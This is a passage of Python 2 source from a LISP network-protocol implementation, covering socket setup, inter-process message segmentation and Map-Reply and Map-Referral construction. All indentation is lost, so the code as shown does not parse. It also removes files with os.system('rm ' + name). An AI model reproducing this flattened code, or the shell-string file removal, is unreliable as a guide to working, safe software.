afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert it to an ASCII hex string, byte-swapping on
# little-endian (x86) systems and zero-filling any longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
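#
# Worked example (illustrative): for LISP_SHA_1_96_ALG_ID the three zero-filled
# pieces are 16 + 16 + 8 = 40 hex characters, i.e. a 20-byte SHA-1 digest; for
# LISP_SHA_256_128_ALG_ID the four pieces are 4 * 16 = 64 hex characters, i.e.
# a 32-byte SHA-256 digest.
#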
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
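#
# Usage sketch (illustrative, not part of the original module): the socket
# family chosen by lisp_open_listen_socket() is driven entirely by its two
# string arguments.
#
#   lisp_open_listen_socket("0.0.0.0", "4342")  # AF_INET UDP socket, port 4342
#   lisp_open_listen_socket("0::0", "4342")     # AF_INET6 UDP socket (v4 or v6)
#   lisp_open_listen_socket("", "lisp-itr")     # non-numeric "port" selects an
#                                               # AF_UNIX datagram socket bound
#                                               # to the path "lisp-itr"
#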
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must have
# the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
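#
# Example of the strings the IPC builders above produce (illustrative values):
#
#   lisp_command_ipc("show map-cache", "lisp-itr")
#     -> "command@14@lisp-itr@@show map-cache"
#   lisp_control_packet_ipc(pkt, "lisp-ms", "10.0.0.1", 4342)
#     -> "control-packet@10.0.0.1@4342@" + pkt
#
# The double "@" in the command/api/data-packet forms marks a null port field
# so all of these IPC types split into the same number of fields.
#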
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 bytes, or 9000 for control-packets) since the
# socket interface will not allow larger sends, and socket.setsockopt() won't
# allow us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
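#
# Segmentation sketch (illustrative numbers): a 4000-byte command IPC is sent
# in chunks of at most 1500 bytes (1500, 1500, 1000); "control-packet" IPCs use
# 9000-byte chunks. A failed sendto() is retried with exponential backoff
# (1 ms, 2 ms, 4 ms, ...) and the destination is declared down once
# retry_count reaches 12.
#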
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endwhile
return(new)
#enddef
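#
# Example (illustrative): an 8-byte packet "\x45\x00\x00\x54\x00\x00\x40\x00"
# is hexlified and emitted in 8-hex-digit (4-byte) groups, giving
# "45000054 00004000" plus trailing whitespace (which is not stripped).
#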
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500-byte segments if the received IPC packet is larger than what
# the socket interface can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the length already received, we only have
# one segment, which is the whole packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@") separator. This is a
# bit-stuffing procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
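#
# Example (illustrative): lisp_bit_stuff(["abc", "def", "ghi"]) returns
# "abc@def@ghi", restoring the 0x40 separators that a previous split("@")
# removed from the payload.
#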
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it, so it is assembled into a complete datagram
# in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator with real data.
# So go to the payload and put back 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want to return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add the output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set (an RTR supporting
# NAT-traversal), return all RLOCs that do not have the same priority as the
# requester's RLOC. Otherwise, return the private RLOCs plus the priority-254
# RTR list so the requesting ITR/PITR encaps to the RTR (or to a directly
# reachable private RLOC).
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Check the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
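#
# Behavior sketch (illustrative addresses): given a registered RLOC-set of
# [RTR 203.0.113.1 priority 254, ETR 10.1.1.1 priority 1, ETR 198.51.100.1
# priority 1], a Map-Request sourced by the RTR gets back the two non-254
# ETR RLOCs, while a Map-Request from an ITR gets back the private 10.1.1.1
# plus the priority-254 RTR entry.
#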
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# it is requesting a subscription, so return a Map-Notify so the ITR knows
# the subscription has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
